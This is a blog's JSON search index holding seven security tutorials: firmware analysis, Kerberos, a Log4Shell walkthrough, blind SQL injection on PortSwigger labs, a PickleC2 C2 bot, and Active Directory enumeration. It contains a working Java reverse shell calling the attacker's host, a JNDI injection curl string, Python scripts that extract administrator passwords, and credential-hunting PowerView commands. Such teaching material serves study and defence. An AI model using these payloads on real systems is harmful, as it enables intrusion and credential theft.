index.json
[{"categories":["IOT-Hacking"],"contents":"Hello friends, I will make a new series about IoT hacking because I want to share my knowledge with y'all. I hope it will be useful and easy to understand.\nWhat is firmware?\nSimply put, it is the brain of a device. Firmware is a piece of software embedded into hardware; without firmware most electronic devices would not work and would be just a piece of iron. All smart devices have their own firmware: TVs, cars, smart plugs.\nFrom where can we update firmware?\nThe manufacturer delivers improvements manually using SPI or JTAG, or OTA (Over The Air). I will discuss all of these in the next blog posts.\nFirmware internals\nBootloader: the bootloader is code that executes before the operating system starts. When you want to load new firmware into a device manually you need the UART or SPI communication ports, and the bootloader helps us interact with the device.\nKernel: the kernel is the central module of an operating system; it connects the system hardware to the application software and is also responsible for process and memory management.\nFile system: it contains all the files stored for the embedded device's runtime, including all web server and network files.\nSo what can we do with firmware? We can find secrets: backdoors, passwords, API keys, private certificates, and vulnerabilities in individual binaries.\nFirmware analysis\nI used the HTB challenge called The Needle; this is the description of the challenge.\nI use the file command to detect the file type.\nThere are many types of file system, such as SquashFS, CramFS, JFFS2, YAFFS2 and EXT2; the most common is SquashFS. 
To detect the firmware's file system you can use hexdump and search for the magic bytes, or you can use binwalk. So it is a SquashFS file system.\nYou can extract the file system using squashfs-tools or binwalk; I prefer binwalk.\nbinwalk -e firmware.bin\nYou will find the file system in the squashfs-root directory.\nThen we need to search for the telnet credentials, and we will find them in the etc/scripts directory, or simply use grep for this.\nAs we see in telnetd.sh, the user is Device_Admin and the password is stored in /etc/config/sign.\nSo let's try these creds.\nEasy peasy, we got the flag.\n","date":"09 Feb, 2022","image":"","permalink":"https://dragonpwn.github.io/blog/iot-hacking-firmware-analysis/","tags":["IOT-hacking"],"title":"IOT Hacking | Firmware Analysis 101"},{"categories":["Network","Active-Directory"],"contents":"First of all, in this blog we will discuss an authentication protocol called Kerberos.\nWhat is Kerberos?\nHow does it work?\nAuthentication flow\nHow can you see your tickets?\nWhat is Kerberos?\n
Kerberos is a network authentication protocol that allows nodes to communicate with each other across an untrusted network by using tickets. Kerberos builds on symmetric key cryptography and runs as a trusted third-party server called the Key Distribution Center (KDC); all users, machines and services in the environment that use Kerberos depend on the KDC.\nHow does it work?\nClient: the user who requests the service.\nServer: the service that the client wants to access.\nTicket Granting Ticket (TGT): a user authentication token issued by the Key Distribution Center (KDC), used to request an access token from the TGS.\nKey Distribution Center (KDC): the trusted third party which contains the database, the Authentication Service (AS) and the Ticket Granting Server (TGS).\nAuthentication Server (AS): the service which authenticates clients and issues them tickets; the TGS then accepts authenticated clients and issues them tickets to access other resources.\nTicket Granting Server (TGS): the part of the KDC that issues service tickets.\nNote: before a service ticket can be issued you must first have a TGT for the AD domain.\nAuthentication flow\nAS-REQ (request TGT): the user asks the Authentication Server (AS) for a TGT.\nThe request includes the User Principal Name (UPN) and a timestamp, and it is encrypted using the user's password hash.\nAS-REP (receive TGT): verify the user's creds.\nThe KDC uses the UPN to search for the user in its database and uses the password hash to decrypt the message; if it successfully decrypts the request and the timestamp is within the KDC's configured time window, the authentication is successful.\nThe Authentication Server computes the TGS secret key, then creates a session key (SK1) encrypted with the user's secret key. The Authentication Server then generates a TGT containing the user ID, user network address, timestamp, lifetime and SK1, and encrypts the ticket with the TGS secret key.\nThe user decrypts the message using their secret key and extracts SK1 
and the TGT to create the authenticator that validates the user to the TGS.\nTGS-REQ (present TGT, request TGS): the user presents the TGT to request a service ticket from the TGS.\nTGS-REP (receive TGS): the KDC validates the TGT, then generates the service ticket. The TGS uses the TGS secret key to decrypt the TGT received from the user, extracts SK1, and checks the user ID, network address and timestamp to make sure the TGT has not expired.\nIf all checks are successful, the KDC generates a service session key (SK2) that is shared between the user and the target server.\nThen the KDC creates a service ticket containing the user ID, network address, timestamp and SK2. The ticket is encrypted with the server's secret key, and the user receives a message with the service ticket and SK2, all encrypted with SK1.\nAP-REQ (present TGS for access): the target server uses its server secret key to decrypt the ticket and extracts SK2 to decrypt the authenticator, then checks the user ID and network address; the server also checks whether the service ticket has expired.\nAP-REP (optional, used when mutual authentication is requested): once the check is finished, the user receives a message from the application server verifying that they can authenticate each other.\nHow can you see your tickets?\n
You can see all your Kerberos tickets with klist.exe: it shows all tickets issued to you on your computer. Run the klist tickets command in cmd or PowerShell.\n","date":"02 Feb, 2022","image":"","permalink":"https://dragonpwn.github.io/blog/kerberos101/","tags":["Network","Active-Directory"],"title":"Kerberos 101"},{"categories":["Web","CVEs","RCE"],"contents":"First of all, to understand the vulnerability we should reverse it. This blog will answer these questions:\n1- What is log4j\n2- LDAP\n3- JNDI\n4- How log4shell works\n5- Exploit\n6- Mitigation\n7- References\nWhat is log4j\nLog4j is an open-source logging framework written in Java, part of the Apache Logging Services. It is used to store log information, and it has a lookup feature that allows it to fetch resources from external servers or Java-based applications via JNDI; Log4Shell hijacks this feature.\nLDAP\nLightweight Directory Access Protocol (LDAP) is simply a protocol used for querying user information. 
Companies store usernames, passwords, email addresses, printer connections and other static data within directories. LDAP is an open, vendor-neutral application protocol for accessing and maintaining that data. LDAP can also handle authentication, so users can sign on just once and access many different files on the server.\nJNDI\nJNDI is the abbreviation for Java Naming and Directory Interface. It is an API that provides naming and directory functionality to applications written in Java and is used to interact with several services; the one we specifically use in this vulnerability is LDAP, because Java applications cannot talk to LDAP directly, so JNDI does this for them.\nHow Log4Shell works\nBy abusing the lookup feature in log4j that we mentioned at the beginning, an attacker can inject a JNDI lookup pointing at an LDAP server they control that serves a malicious Java class. The vulnerable server downloads the injected payload and executes it, giving the attacker full control of the server.\nExploit\nTo exploit log4j you first need a malicious LDAP server such as marshalsec; second, you need a public IP and two ports, one for LDAP and one for the HTTP server that hosts the malicious class.\nSet up the LDAP server:\njava -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \"http://[IP]:[PORT]/#Reverse\"\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class Exploit {\n    public Exploit() throws Exception {\n        String host = \"%s\"; // Your public IP\n        int port = %d; // Listener port\n        String cmd = \"/bin/sh\";\n        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n        Socket s = new Socket(host, port);\n        InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n        OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n        while (!s.isClosed()) {\n            while (pi.available() > 0) so.write(pi.read());\n            while (pe.available() > 0) 
so.write(pe.read());\n            while (si.available() > 0) po.write(si.read());\n            so.flush();\n            po.flush();\n            Thread.sleep(50);\n            try {\n                p.exitValue();\n                break;\n            } catch (Exception e) {\n            }\n        }\n        p.destroy();\n        s.close();\n    }\n}\nWe need to save and compile it:\njavac Reverse.java -source 8 -target 8\nNow we need to run a Python SimpleHTTPServer to host the class, then run netcat listening on the same port you used in Reverse.java.\nNow let's curl the URL:\ncurl '[URL]/login?cmd=$\\{jndi ldap:/[IP]:[Port]/Reverse\\}'\nNow you get RCE in the application.\nMitigation\nDisable all JNDI features; support for message lookups was removed from version 2.16.0 onward.\nUpdate log4j to version 2.17.0.\nUsing an IPS or firewall will repel the proverbial \"script kiddies\" copy-pasting vanilla ${ jndi:...} strings, but it is no substitute for patching.\nReferences\nWhat Is LDAP & How Does It Work? - Okta\nJNDI Overview - oracle.com\nlog4j-shell-poc\n","date":"17 Jan, 2022","image":"","permalink":"https://dragonpwn.github.io/blog/log4shellcve-2021-44228/","tags":["Web","CVEs","RCE"],"title":"Log4Shell (CVE-2021-44228)"},{"categories":["Web","Sql 
Injection"],"contents":"In this blog we will solve the PortSwigger labs for blind SQL injection with Python.\nWhat is blind SQL injection?\nIt's a type of SQL injection that happens when the web application is vulnerable but the response doesn't contain the results of the query or any database errors.\nBlind SQL injection with conditional responses\nFirst of all, we have a web application that sends a TrackingId cookie in the request header.\nCookie: TrackingId='Value'\nWhen the request contains the TrackingId cookie, the application determines whether this is a known user using an SQL query:\nSELECT TrackingId FROM <Table_name> WHERE TrackingId = 'value'\nThis query is vulnerable to SQL injection, but the results aren't returned to the user. Okay, let's see what we can do.\nNote: I will solve the PortSwigger blind SQL labs to describe these techniques.\nFirst, open Burp Suite and run your proxy.\nLet's test it with a basic SQL condition and see the behavior of the application.\nTrackingId=ofa7'+OR+1=1--\nIf we return to the web application we will see that the \"Welcome back\" message appears.\nLet's try a false condition.\nTrackingId=ofa7'+OR+1=2--\nNow we have verified the injection point. The second step is to enumerate tables, and I will use Python for this.\nofa7'UNION SELECT 'a' FROM <Table_Name> WHERE 1=1--\nI have a list of table names.\nimport requests\nfrom sys import argv\n\nurl = \"\"  # lab URL\ntrust_string = \"Welcome back\"\nresult = ''\nTable_name = argv[1]\nnames = open(Table_name, \"r\")\nTry = []\nfor n in names:\n    Try.append(n.strip())\nprint(\"[+] Extract Info\")\nfor T in Try:\n    payload = \"ofa7'UNION SELECT 'a' FROM %s WHERE 1=1--\" % T\n    print(\"Trying Table 
Name : %s\" % T)\n    cookie = {\"TrackingId\": payload}\n    response = requests.get(url, cookies=cookie)\n    if trust_string in response.content.decode('utf-8'):\n        print(\"[+] Result is : \", T)\n        break\nWe got the table name: users.\nNow let's enumerate the columns; we need to know the column that the administrator value is part of, so the query will be:\nofa7'UNION SELECT 'a' FROM users WHERE %s=\"administrator\"--\nAll we have to do is change the payload in the code, and now we have the column name too: username.\nAnother way to enumerate columns:\nofa7'UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' AND column_name LIKE '%s'--\nEnumerate for the second column.\nTo enumerate the password length use:\nofa7'AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>%i)='a\nFinal payload:\nofa7'UNION SELECT 'a' from users WHERE username = 'administrator' AND substring(password,%i,1)='%s'--\nimport requests\nimport string\n\ncharacters = list(string.ascii_lowercase)\ncharacters += list(string.digits)\nurl = \"\"  # Target URL\nlength = 20\ntrust_string = \"Welcome back!\"\nresult = ''\nprint(\"[+] Extract Info\")\nfor i in range(1, length + 1):\n    for char in characters:\n        payload = \"ofa7'UNION SELECT 'a' from users WHERE username = 'administrator' AND substring(password,%i,1)='%s'--\" % (i, char)\n        print(\"Trying Number %i with: \" % i, char)\n        cookie = {\"TrackingId\": payload}\n        response = requests.get(url, cookies=cookie)\n        if trust_string in response.content.decode('utf-8'):\n            result += char\n            break\n
print(\"[+] Result is : \", result)\nBlind SQL injection with conditional errors\nPassword length:\n'|| (SELECT CASE WHEN LENGTH(password)>1 THEN TO_CHAR(1/0) ELSE '' END FROM <TABLE> WHERE <Column> = '...')||'\nPassword brute force:\n'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'\nimport requests\nimport string\n\ncharacters = list(string.ascii_lowercase)\ncharacters += list(string.digits)\nurl = \"\"  # Target URL\nlength = 20\nresult = ''\nprint(\"[+] Extract Info\")\nfor i in range(1, length + 1):\n    for char in characters:\n        payload = \"a'||(SELECT CASE WHEN SUBSTR(password,%i,1)='%s' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'\" % (i, char)\n        print(\"Trying Number %i with: \" % i, char)\n        cookie = {\"TrackingId\": payload}\n        response = requests.get(url, cookies=cookie)\n        if response.status_code == 500:\n            result += char\n            break\nprint(\"[+] Result is : \", result)\nBlind SQL injection with time delays and information retrieval\nMicrosoft SQL Server:\n'; IF (1=2) WAITFOR DELAY '0:0:10'--\nPostgreSQL:\n'||pg_sleep(5)--\nBlind SQL injection with time delays and information retrieval\na'%%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,%i,1)='%s')+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users--\nimport requests\nimport string\nfrom requests.exceptions import Timeout\n\ncharacters = list(string.ascii_lowercase)\ncharacters += list(string.digits)\nurl = \"\"  # Target URL\nlength = 20\nresult = ''\nprint(\"[+] Extract 
Info\")\nfor i in range(1, length + 1):\n    for char in characters:\n        payload = \"a'%%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,%i,1)='%s')+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users--\" % (i, char)\n        print(\"Trying Number %i with: \" % i, char)\n        cookie = {\"TrackingId\": payload}\n        try:\n            requests.get(url, cookies=cookie, timeout=5)\n        except Timeout:\n            result += char\n            break\nprint(\"[+] Result is : \", result)\n","date":"20 Sep, 2021","image":"","permalink":"https://dragonpwn.github.io/blog/blind-sql/","tags":["Web","Sql Injection"],"title":"Blind SQL with Python"},{"categories":["RedTeaming","python"],"contents":"PickleC2-Bot\nThis Discord bot will help you control your target through PickleC2.\nDownload\nWhat's PickleC2?\n
PickleC2 is a simple C2 framework written in Python 3, made to help the community of penetration testers in their red teaming engagements.\nPickleC2 has the ability to import your own PowerShell modules for post-exploitation and lateral movement, or to automate the process.\nCheck it out\nUSAGE\nList Listeners\nList Implants\nInteract\nPowershell\nCMD\nHelp\nIn the help option you can see the help for the functions:\nHelp Implant\nHelp listener\nHelp Interact\nINSTALLATION\nYou have two options to download PickleC2-Bot; feel free to use either of them.\nNOTE: the important thing is that you need to put bot.py in the PickleC2 folder.\nOne-liner\nYou can install PickleC2-Bot directly through the following command:\necho \"Enter the PickleC2 Folder: \";read PickleC2Path;wget https://raw.githubusercontent.com/Sh4d3-Pwn3r/PickleC2-Bot/main/bot.py -O $PickleC2Path/bot.py;chmod +x $PickleC2Path/bot.py\nNormal installation\nYou can also install PickleC2-Bot through the following commands:\ncd {PickleC2_Path}\ngit clone https://github.com/Sh4d3-Pwn3r/PickleC2-Bot.git\nchmod +x bot.py\nAfter installing the script, you'll need to create a Discord developer account to generate a bot token, then put it in bot.py.\nCredit\nI want to say a special thank you to @xRET2pwn for the help and support.\nHappy Hacking :)\n","date":"19 Sep, 2021","image":"
","permalink":"https://dragonpwn.github.io/blog/picklec2-bot/","tags":["RedTeaming","python"],"title":"PickleC2-Bot"},{"categories":["Network","Active-Directory"],"contents":"In this part we will discuss domain enumeration using PowerView or the ADModule; I'll use PowerView.\nLet's import it:\nPS C:\\Users\\adlab> . .\\PowerView.ps1\nDomain Enumeration\nCurrent domain:\nPS C:\\Users\\adlab> Get-NetDomain\nGet other domains:\nPS C:\\Users\\adlab> Get-NetDomain -Domain <Domain name>\nGet the domain SID for the current domain:\nPS C:\\Users\\adlab> Get-DomainSID\nGet the current domain controller:\nPS C:\\Users\\adlab> Get-NetDomainController\nGet the domain controller for another domain:\nPS C:\\Users\\adlab> Get-NetDomainController -Domain <Domain Name>\nGet the domain policy:\nPS C:\\Users\\adlab> Get-DomainPolicy\nUser Enumeration\n
Get the list of users in the current domain with all properties:\nPS C:\\Users\\adlab> Get-NetUser\nWe can filter the result to get only the names of the users:\nPS C:\\Users\\adlab> Get-NetUser | select cn\nGet info for a specific user:\nPS C:\\Users\\adlab> Get-NetUser -SamAccountName <The name of User>\nGet user properties:\nPS C:\\Users\\adlab> Get-UserProperty\nGet the last password change:\nPS C:\\Users\\adlab> Get-UserProperty -Properties pwdlastset\nSearch for a particular string in users' attributes:\nPS C:\\Users\\adlab> Find-UserField -SearchField Description -SearchTerm \"password\"\nsamaccountname Description\n-------------- -----------\nSQL Service    my pass is : MYpassword123$\nGet actively logged-on users on a machine (needs local admin rights on the target):\nPS C:\\Users\\adlab> Get-NetLoggedon -ComputerName <servername>\nGet the list of computer names in the current domain:\nPS C:\\Users\\adlab> Get-NetComputer\nGet more data about computers in the current domain:\nPS C:\\Users\\adlab> Get-NetComputer -FullData\nCheck which machines are alive:\nPS C:\\Users\\adlab> Get-NetComputer -Ping\nGet groups in the current domain:\nPS C:\\Users\\adlab> Get-NetGroup\nGet groups in a specific domain:\nPS C:\\Users\\adlab> Get-NetGroup -Domain <targetdomain>\nGet more data about groups in the current domain:\nPS C:\\Users\\adlab> Get-NetGroup -FullData\nGet all groups in the domain containing the word \"admin\":\nPS C:\\Users\\adlab> Get-NetGroup *admin*\nGet all members of the Domain Admins group:\nPS C:\\Users\\adlab> Get-NetGroupMember -GroupName 'Domain Admins'\nGet the list of local group memberships on a machine (needs administrator privileges on a non-DC machine):\nPS C:\\Users\\adlab> Get-NetLocalGroup -ComputerName <dcname>\nGet the list of all local groups on a machine (needs administrator privileges on a non-DC machine):\nPS 
C:\\Users\\adlab> Get-NetLocalGroup -ComputerName <dcname> -ListGroups\nFind shares in the current domain:\nPS C:\\Users\\adlab> Invoke-ShareFinder -Verbose\nFind sensitive files on computers in the current domain:\nPS C:\\Users\\adlab> Invoke-FileFinder -Verbose\nGet all file servers in the current domain:\nPS C:\\Users\\adlab> Get-NetFileServer -Verbose\nNote: if you do not know what a GPO is, go to the Introduction to Active Directory post; you will find it there.\nGet the list of GPOs in the current domain:\nPS C:\\Users\\adlab> Get-NetGPO\nFilter the result to get only the group policy names:\nPS C:\\Users\\adlab> Get-NetGPO | select displayname\nGet the GPOs applied to a specific computer:\nPS C:\\Users\\adlab> Get-NetGPO -ComputerName <ComputerName>\nThere is also the built-in gpresult command, which displays the Resultant Set of Policy (RSoP) information for a target user and computer. We use the '/R' parameter to display the RSoP summary data, and we can also use the '/V' parameter to display verbose information.\nPS C:\\Users\\adlab> gpresult /R /V\nGet restricted groups:\nPS C:\\Users\\adlab> Get-NetGPOGroup\nGet users which are in a local group of a machine using GPO:\nPS C:\\Users\\adlab> Find-GPOComputerAdmin -ComputerName <computername>\nGet machines where the given user is a member of a specific group:\nPS C:\\Users\\adlab> Find-GPOLocation -UserName <username> -Verbose\nGet OUs in a domain:\nPS C:\\Users\\adlab> Get-NetOU -FullData\nGet the GPO applied on an OU using its gplink:\nPS C:\\Users\\adlab> Get-NetGPO -GPOname \"gplink\"\nEnumerate ACLs\nGet the ACLs associated with a specific object:\nPS C:\\Users\\adlab> Get-ObjectAcl -SamAccountName <samaccountname> -ResolveGUIDs\nGet a list of all domain trusts for the current domain:\nPS C:\\Users\\adlab> Get-NetDomainTrust\nGet 
Details about the current forest:\nPS C:\\Users\\adlab> Get-NetForest\nGet all domains in the current forest:\nPS C:\\Users\\adlab> Get-NetForestDomain\nGet all global catalogs for the current forest:\nPS C:\\Users\\adlab> Get-NetForestCatalog\nGet the trusts of the forest:\nPS C:\\Users\\adlab> Get-NetForestTrust\nGet all machines in the current domain where the current user has local admin access:\nPS C:\\Users\\adlab> Find-LocalAdminAccess -Verbose\nIf the ports used by Find-LocalAdminAccess (RPC, SMB) are blocked, there is another way: we can do it using remote administration tools like WMI and PowerShell remoting.\nPS C:\\Users\\adlab> . .\\Find-WMILocalAdminAccess.ps1\nPS C:\\Users\\adlab> Find-WMILocalAdminAccess\nGet computers where a domain admin has sessions:\nPS C:\\Users\\adlab> Invoke-UserHunter\nTo confirm admin access:\nPS C:\\Users\\adlab> Invoke-UserHunter -CheckAccess\nGet computers where a domain admin is logged in, in stealth mode:\nPS C:\\Users\\adlab> Invoke-UserHunter -Stealth\nNow we will talk about the defending part and have a look at one of the most lethal enumeration techniques: user hunting.\nNetCease is a script which changes the permissions on the NetSessionEnum method by removing the permission for the Authenticated Users group.\nThis script defeats much of an attacker's session enumeration.\nPS C:\\Users\\adlab> . .\\NetCease.ps1\nThere is another interesting script from the same author, SAMRi10, which hardens Windows 10 and Windows Server 2016 against enumeration that uses the SAMR protocol (like net.exe).\nEnumeration using BloodHound\nUsing the PowerShell ingestor:\nPS C:\\Users\\adlab> . 
.\\SharpHound.ps1\nPS C:\\Users\\adlab> Invoke-BloodHound -CollectionMethod All\nUsing the SharpHound executable ingestor:\nPS C:\\Users\\adlab> .\\SharpHound.exe -CollectionMethod All\nAnd now we finish this series (Active Directory Enumeration). In the next series we will talk about the Local Privilege Escalation part. I hope you enjoyed reading, see you <3.\n","date":"16 Feb, 2021","image":"","permalink":"https://dragonpwn.github.io/blog/domain-enumeration/","tags":["Network","Active-Directory"],"title":"Active Directory Enumeration"},{"categories":["Network","Active-Directory"],"contents":"Active Directory (AD): a directory service used to manage Windows networks. It stores information about the network and makes it easily available to users and admins.\nDomain Controller (DC): in short, the DC is the admin of the Active Directory and has access to the whole network. More precisely, the role of the Domain Controller is to provide authentication and authorization to different services and users.\nNTDS.DIT: Active Directory keeps its database, which has information about 
users, services and applications, in the NTDS.DIT file, located in the \"%SystemRoot%\\NTDS\" folder. Because of that it is the most critical file in AD.\nAD components you should know\nDomain: a domain is used to group objects together and manage them. It provides authentication and authorization, which gives a way to limit the scope of access to the resources of that domain.\nTrees: a group of domains with the same root; domains in this group trust each other, e.g. CORP.local » x.CORP.local, y.CORP.local.\nForest: the forest is the highest level of the organization hierarchy; it contains a collection of trees, and the trees are connected by trust relationships.\nOrganizational Units (OU): a container that holds Active Directory objects like users, groups and computers. It is the smallest unit in AD to which the administrator can assign group policy settings or account permissions, and an OU cannot contain objects from another domain.\nTrust: a way to let different domains access each other's resources, so that users can gain permission to those resources. There are two types of trust.\nDirectional trust: this trust is easy to understand; it simply goes from the trusting domain to the trusted domain.\nTransitive trust: a two-way relationship created between parent and child domains. When we create a domain, it shares resources with the parent domain by default. The transitive property of equality states that if a = b and b = c, then a = c; in a transitive trust relationship, if domain A trusts domain B, and domain B trusts domain C, then domain A trusts domain C.\nLightweight Directory Access Protocol (LDAP): AD is based on the Lightweight Directory Access Protocol (LDAP). 
This protocol provides a common language for clients and servers to speak to one another.\nSID: a Security Identifier is a unique ID that the Domain Controller uses to identify a user, group or computer on the network.\nGroup Policy (GPO): Group Policy provides the ability to manage configuration and changes easily in AD.\nConfiguration like:\nSecurity settings.\nRegistry-based policy settings.\nGroup policy preferences like startup/shutdown/log-on/log-off script settings.\nSoftware installation.\nGPOs can be abused for various attacks like privesc, backdoors, persistence etc.\nAccess Control Model: the ability to control how processes access objects and resources in Active Directory, based on:\nAccess Token: the security context of a process (identity and privileges of the user).\nSecurity Descriptor: the SID of the owner, the Discretionary ACL (DACL) and the System ACL (SACL).\nAccess Control List (ACL): a list of access control entries (ACEs); each ACE corresponds to an individual permission or audit, i.e. who has permission and what can be done on an object.\nDiscretionary ACL (DACL): the list of permissions defining who has permission to access the object.\nSystem ACL (SACL): logs success and failure audit messages when an object is accessed.\nI hope it's useful, see you in the next part <3.\n","date":"15 Feb, 2021","image":"
","permalink":"https://dragonpwn.github.io/blog/active-directory-intro/","tags":["Network","Active-Directory"],"title":"Introduction to Active Directory"}]